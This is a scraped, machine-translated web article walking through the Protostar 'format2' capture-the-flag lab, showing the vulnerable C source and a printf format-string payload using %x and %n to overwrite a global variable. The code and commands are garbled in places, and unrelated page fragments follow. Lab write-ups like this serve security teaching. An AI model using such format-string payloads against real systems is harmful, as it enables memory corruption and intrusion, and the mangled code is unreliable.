In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
AboutThis level moves on from format1 and shows how specific values can be written in memory.This level is at / opt/protostar/bin/format2Source code#include
# include
# include
# include
Int target
Void vuln ()
{
Char buffer [512]
Fgets (buffer, sizeof (buffer), stdin)
Printf (buffer)
If (target = = 64) {
Printf ("you have modified the target:)\ n")
} else {
Printf ("target is% d: (\ n", target)
}
}
Int main (int argc, char * * argv)
{
Vuln ()
}
This question is a little different from the previous question: 1. Change the parameter to fgets;2, and target=64 also needs to find the location of target user@protostar:/opt/protostar/bin$ objdump-t. / format2 | grep target
080496e4 g O .bss 00000004 target
Also find out the location of the assignment action: user@protostar:/opt/protostar/bin$ python-c 'print "aaaaaaaa" + "% x." * 150' |. / format2
Aaaaaaaa200.b7fd8420.bffff624.61616161.61616161.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825. 78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.a2e78.b7eada75.b7fd7ff4. 80496b0.bffff7c8.8048338.b7ff1040.80496b0.bffff7f8.80484f9.b7fd8304.b7fd7ff4.80484e0.bffff7f8.b7ec6365.b7ff1040.bffff7f8.80484c6.80484e0.0.bffff878.b7eadc76.1.bffff8a4.bffff8ac.b7fe1848.bffff860.ffffffff.b7ffeff4.8048285.1.bffff860.b7ff0626.
Target is 0: (
Nice, this is close. Also confirm the location: user@protostar:/opt/protostar/bin$ python-c 'print "aaaaaaaa%x%x%x%x"' |. / format2
Aaaaaaaa200b7fd8420bffff62461616161
Target is 0: (follow the previous question and see what happens: user@protostar:/opt/protostar/bin$ python-c 'print "\ xe4\ x96\ x04\ x08aaaa%x%x%x%n" |. / format2
Aaaa200b7fd8420bffff624
Target is 27: (OK, the value of target has been successfully changed here. The title requirement is 64. You only need to output% x 'print "\ xe4\ x96\ x04\ x08aaaa%40x%x%x%n"' |. / format2.
Aaaa 200b7fd8420bffff624
You have modified the target:)
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
